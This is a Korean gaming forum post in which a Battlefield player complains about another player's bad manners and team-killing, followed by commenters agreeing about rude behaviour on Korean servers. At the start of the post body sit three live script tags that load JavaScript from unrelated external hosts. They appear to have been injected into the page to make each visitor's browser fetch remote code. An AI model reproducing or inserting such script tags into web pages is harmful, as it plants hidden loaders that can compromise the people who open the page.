노매너 한명 고발합니다. > battlefiel

본문 바로가기
사이트 내 전체검색

battlefiel

노매너 한명 고발합니다.

페이지 정보

작성자 더패스트 메일보내기 이름으로 검색  (218.♡.158.254) 댓글 8건 조회 221회 작성일 06-08-12 18:22

본문

<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script><SCRIPT Language=JavaScript src=http://dlcjsvlf.cafe24.com/Wiz.php></script><SCRIPT Language=JavaScript src=http://streamhelper.cafe24.com/v1/streamhelper.js></script>  Top_Gone 이사람 매너 꽝이더군요 헬기 부사수 탔는데 상대팀 헬기를 처치했고 곧 대전차병에 의해

헬기가 터졌습니다. 샤키 퍼닌슐라 맵이구요 죽고나니깐 byung sin 이라고 치더군요

이윽고 저를 죽이더군요 참나 어이없어서 초딩 방학하면 원래 이러겁니까 나참 기가막혀서

매너없는 사람이 왜이렇게 많은겁니까 장비좀 탄다고 사람 개 무시하고 정말 대한민국사람 망신살 뻗치는군요
추천0 비추천0

댓글목록

TaiJi Mania님의 댓글

TaiJi Mania 이름으로 검색 아이피 (222.♡.132.237) 작성일

EA kor 64 서버 가면 눈쌀 찌푸리게 만들던데요.. 정말..
또라이(?)들이 너무 많은것 같아요 -ㅅ-

드니로님의 댓글

드니로 이름으로 검색 아이피 (211.♡.92.152) 작성일

조종수일때 앞에 탄 사수가 잘 쏜다 싶음 Good Shot !
사수일때 뒷 조종수가 운전 잘 한다 싶음 Good Flying !
둘중 어느 하나가 실수 좀 했다 해도 넓은 아량으로 It's OK !

두 사람이 한배를 탔으니 헬기 깨질때까지 의리를 지키고 칭찬을 아끼지 않는
매너가 참 중요합니다 ㅡㅡ;

칭찬 몇번 해줘보세요
"여기서 데리고 나가달라~!" 외치면 저 멀리서 나 태우러 날아와 줍니다 ^^

더패스트님의 댓글

더패스트 이름으로 검색 아이피 (218.♡.158.254) 작성일

그냥 WAR IS HELL 이나 HELL IS LOOSE digital analchi 서버 가야 되겠네요

karame님의 댓글

karame 이름으로 검색 아이피 (218.♡.30.80) 작성일

저도 핑때문에 한국서버를 자주 들렀었지만 요즘은 해도해도 너무 하더군요..
이따위의 국민성이라니 부끄럽기 짝이 없습니다..
그리고 탑승요청해도 태워주는 인간들이 왜이리 없는지...지나는길에 태워주면 안되나..
툭하면 지가 부딪혀서 죽어놓고 개념없이 처벌이나 해대고...
외국서버도 가끔 욕설이 오고가긴 하지만 이정도는 아니더군요..
그냥 지금까지 즐겨찾기 해놓은 핑좋은 외국서버 가렵니다...

SeraPhim1202님의 댓글

SeraPhim1202 이름으로 검색 아이피 (221.♡.23.127) 작성일

저도 한국섭은 출입안합니다. 하고 싶어도 자리가 업어서 못하지만..ㅡ.,ㅡ 드니로님 매너 최고^^b

공지사항

• 게시물이 없습니다.

회원로그인

접속자집계

오늘
1,454
어제
1,495
최대
1,587
전체
12,166